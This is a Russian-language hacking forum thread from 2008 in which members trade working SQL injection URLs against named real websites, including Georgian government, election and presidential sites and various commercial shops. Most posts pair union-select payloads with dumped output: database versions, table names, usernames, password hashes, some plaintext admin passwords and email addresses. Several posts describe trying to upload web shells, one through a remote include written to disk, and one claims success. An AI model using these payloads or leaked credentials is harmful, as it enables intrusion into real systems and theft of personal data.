SQL Инъекции

~!DoK_tOR!~ · 10 Aug 2008

DimOnOID said:
Code:
http://www.results.cec.gov.ge/major_olq.php?district=1%20or%201=@@version--
в MSSQL Не силён((
Click to expand...
http://www.results.cec.gov.ge/major_olq.php?district=1%20or%201=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES)--
Click to expand...

кодировка ппц )

dr.Pilulkin · 10 Aug 2008

http://www.adjara.gov.ge/eng/index.php?page=show&id=-919+union+select+1,2,3,version()--

$p01nt · 10 Aug 2008

www.president.gov.ge

http://www.president.gov.ge/index.php?l=G&m=0&sm=3&id=2693+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0/*
5.0.22-log
president_gov_ge

В таблице юзерс только один логин/пароль
nino:fe3af9dcad7c5f65ae0e8a19ba6cb1f0(ni654)

Админка: http://www.president.gov.ge/admin.php, но ацес дейнед-видимо лок по ип
kolkhida.ge
http://www.kolkhida.ge/rus/view_gancx.php?id=-7%27+union+select+1,2,3,4,5,6,7,8,9/*
4.1.20
test

www.museum.ge
http://www.museum.ge/web_page/index.php?id=-40+union+select+1,2,3,4,5,6,7,8,9
4.1.22-standard-log
museumg_zaza

Cennarios · 10 Aug 2008

http://www.norma.com.ua/main_description.php?newsletters_id=1'+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(CONCAT((SELECT+CONCAT(customers_email_address,0x3a3a,customers_password)+FROM+customers+limit+32,1)),0x71),0x71),4,5,6/*

Походу опять многократный хеш....

S0ulVortex · 10 Aug 2008

Code:
http://www.safelider.ru/view.php?item=-2877+union+select+1,user(),database(),version(),5,6,7,8,9,0/*
Помогите плиз незнаю что дальше делать я просто только начинаю все осваивать и несовсем получается.

$p01nt · 10 Aug 2008

S0ulVortex вопросы по уязвимостям не сюда,дальше либо брут(если четвертая),либо вывод таблиц (если пятая) на сайте есть отличный фак! Читай!

$n@ke · 10 Aug 2008

S0ulVortex said:
Code:
http://www.safelider.ru/view.php?item=-2877+union+select+1,user(),database(),version(),5,6,7,8,9,0/*
Помогите плиз незнаю что дальше делать я просто только начинаю все осваивать и несовсем получается.
Click to expand...
вот, просмотрел немного бд.
Version: 5.0.45-log
User: [email protected]
Database name: u13238
Database name: u13238_2
Database name: u13238_3

и кончилось терпение))

u13238.users
Click to expand...

id:loginASSWORD:fullname:email

3:v87zmi39:$1$8H$WcE80yjcg7U6/lAyfPhc80:Константин:[email protected]
11din:$1$E8$LTHwBBzaSQuFt2urqBkF5.:Андрей Ганзевич[email protected]
9:v650mdr5:$1$QJ$1ULsLd3yP3jemXdo7l7Kt.:Андрей Сидоров:[email protected]
Click to expand...

Cennarios · 10 Aug 2008

http://koshhejjka.sirenes.ru/index.php?d=22&p=-1+union+select+concat(name,0x3a3a,e_mail,0x3a3a,pass),2,3,4+from+tbl_artist+limit+1,10/*

Косяковые гловы....
login: [email protected]
pass: jxtymcnhfiyjtrbyj

.acme · 10 Aug 2008

http://perekrestok.ca/

http://perekrestok.ca/?page=countries&country_id=-1+union+select+1,2,unhex(hex(concat(login,0x3,password,0x3,email,0x3,icq))),4,5,6,7+from+users+limit+0,0--

4.1.20inetlaba_perek@localhostinetlaba_perek

Adminvan1238[email protected]111
Superadminvfhbzuelbyf[email protected]
gendolfvfhbzuelbyf[email protected]

-=Static=- · 10 Aug 2008

$n@ke said:

вот, просмотрел немного бд.
Version: 5.0.45-log
User: [email protected]
Database name: u13238
Database name: u13238_2
Database name: u13238_3

и кончилось терпение))
Click to expand...

На этой же базе висит сайт:
http://vozmi.ru
ТИЦ: 130
PR: 4
Code:
http://vozmi.ru/furniture/catalog.php?catalog=-97+union+select+user(),2,3/*

dr.Pilulkin · 10 Aug 2008

http://www.results.cec.gov.ge/ubnebi.php?district=22+and+1=@@version--

Microsoft SQL Server 2005 - 9.00.1399.06 (Intel X86) Oct 14 2005 00:33:37 Copyright (c) 1988-2005 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2)

DDoSька · 10 Aug 2008

http://www.fofg.org/act/act_petition.php?pid=-1+union+select+1,2,3,4,5,6,7/*
version:4 =\
Click to expand...

*******************

http://www.nationmultimedia.com/qvote/view_poll.php?page=13&pid=-239+union+select+1,convert(version()+using+latin1),3
version:4=\
Click to expand...

*******************

http://www.cetim.ch/fr/publications_details.php?pid=-115+union+select+1,version(),3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5/*
Click to expand...

Version:5.0.45-log3
user:[email protected]

http://www.cetim.ch/fr/publications_details.php?pid=-115+union+select+1,table_name,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5+from+information_schema.tables+limit+18,10/*
Click to expand...

ничего интересного - сайт носит информационный характер
---------------------------------------------------------------------

http://www.solfocus.com/product.php?pid=-4+union+select+1,versio(),3,4,5,6,7,8/
Click to expand...

*
User:root@localhost
Version:5

http://www.solfocus.com/product.php?pid=-4+union+select+1,table_name,3,4,5,6,7,8+from+information_schema.tables+limit+18,10/*
Click to expand...

Есть таблица db,копия mysql.user

http://www.solfocus.com/product.php?pid=-4+union+select+1,concat_ws(0x3a,user,password),3,4,5,6,7,8+from+mysql.user/*
Click to expand...

root:*2F69143FB5C4B18522CA1EC561E137AB9D3F9170
Не могу залить шелл,расскажете если кто-то зальет)
а то я и так делал:

http://www.solfocus.com/product.php?pid=-4+union+select+1,<? @include("http://*****.narod.ru/shell.txt"); ?>,3,4,5,6,7,8+from+mysql.user+into+outfile+'C:\Inetpub\phproot\hex.php'/
Click to expand...

и в HEX фигачил,все равно не помогло =(

Zircool · 10 Aug 2008

http://www.fergusonhill.co.uk/

http://www.fergusonhill.co.uk/product_details.php?id=7+union+select+1,2,3,4,5,6,7,8,9,version(),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86/*
Click to expand...

Cennarios · 11 Aug 2008

Ахтунг! =)

http://www.stayer.su/index.php?res=collection&cmd=view&id=-1+union+select+concat(login,0x3a3a,password,0x3a3a,name,0x3a3a3a3a)+from+users+limit+0,1/*

Сначала пытался потыкать админовскими реквизитами в формочку авторизации на главной страничке сего чудного сайта. Не получилось. Хитрый администратор спрятал мою админку в http://www.stayer.su/adm

Логинимся. Заливаем шел.

Юзаем: тут был шел ...

Calcutta · 11 Aug 2008

http://bdigital.biz/index.php?pageid=214+AND+ascii(lower(substring(version(),1,1)))=51

version=3.*.*.*

S0ulVortex · 11 Aug 2008

http://www.avtobamper.ru/item_view.php?id=49&item_id=-1+union+select+1,2,3,Version(),5,user(),7,database(),9,10,11,12,13/*
Можно чёнють седлать? Пытался нече неполучилось
Вот ещё немагу найти админку, все нашол а админку нет
http://www.good-food.ru/

Calcutta · 11 Aug 2008

http://hutro.com/index.php?pageid=15+union+select+1,2,concat_ws(0x3a,user(),database(),version()),4,5,6,7,8,9,10,11,12--
hutro_hutro@localhost:hutro_hutro:4.1.22-standard-log

http://hutro.com/index.php?pageid=15+union+select+1,2,table_name,4,5,6,7,8,9,10,11,12+from+information_schema.tables+limit+0,1--
выдает:
Code:
SELECT * FROM aadm_menu WHERE id=15 union select 1,2,table_name,4,5,6,7,8,9,10,11,12 from information_schema.tables limit 0,1--: SELECT command denied to user 'hutro_hutro'@'localhost' for table 'tables'

Warning: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in /home/hutro/public_html/index.php on line 86

Calcutta · 11 Aug 2008

вообще без вывода: http://biomac.ru/index.php?pageid=117+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--

http://biomac.ru/index.php?pageid=117+AND+ascii(lower(substring(version(),1,1)))=52--
version() = 4.*.*.*

edited:
http://www.amanda-nylons.com/index.php?pageID='
странно как-то -) order+by говорит что 1 колонка, а union+select+1 никак вообще. мож кто разберется.

mister · 11 Aug 2008

Calcutta said:

вообще без вывода: http://biomac.ru/index.php?pageid=117+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--

http://biomac.ru/index.php?pageid=117+AND+ascii(lower(substring(version(),1,1)))=52--
version() = 4.*.*.*
Click to expand...

http://biomac.ru/index.php?pageid=-117+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--

Zircool · 11 Aug 2008

Сайт: www.blackratpress.co.uk PR=5

http://www.blackratpress.co.uk/event.php?id=9+union+select+1,concat_ws(0x3a,username,password),3,4,5,6,7+from+admin_login+limit+2,1/*
Click to expand...

Админка:

http://www.blackratpress.co.uk/admin/
Click to expand...

Логин и пароль админа:

abovo:1010cambourne
Click to expand...

Пытался залить шелл, ничего не получлось, у кого получится отпостите...

SQL Инъекции

~!DoK_tOR!~ Banned

dr.Pilulkin Elder - Старейшина

$p01nt Elder - Старейшина

Cennarios Elder - Старейшина

S0ulVortex Elder - Старейшина

$p01nt Elder - Старейшина

$n@ke Elder - Старейшина

Cennarios Elder - Старейшина

.acme Elder - Старейшина

-=Static=- Banned

dr.Pilulkin Elder - Старейшина

DDoSька Elder - Старейшина

Zircool Elder - Старейшина

Cennarios Elder - Старейшина

Calcutta Elder - Старейшина

S0ulVortex Elder - Старейшина

Calcutta Elder - Старейшина

Calcutta Elder - Старейшина

mister Elder - Старейшина

Zircool Elder - Старейшина

Useful Searches

SQL Инъекции

~!DoK_tOR!~ Banned

dr.Pilulkin Elder - Старейшина

$p01nt Elder - Старейшина

Cennarios Elder - Старейшина

S0ulVortex Elder - Старейшина

$p01nt Elder - Старейшина

$n@ke Elder - Старейшина

Cennarios Elder - Старейшина

.acme Elder - Старейшина

-=Static=- Banned

dr.Pilulkin Elder - Старейшина

DDoSька Elder - Старейшина

Zircool Elder - Старейшина

Cennarios Elder - Старейшина

Calcutta Elder - Старейшина

S0ulVortex Elder - Старейшина

Calcutta Elder - Старейшина

Calcutta Elder - Старейшина

mister Elder - Старейшина

Zircool Elder - Старейшина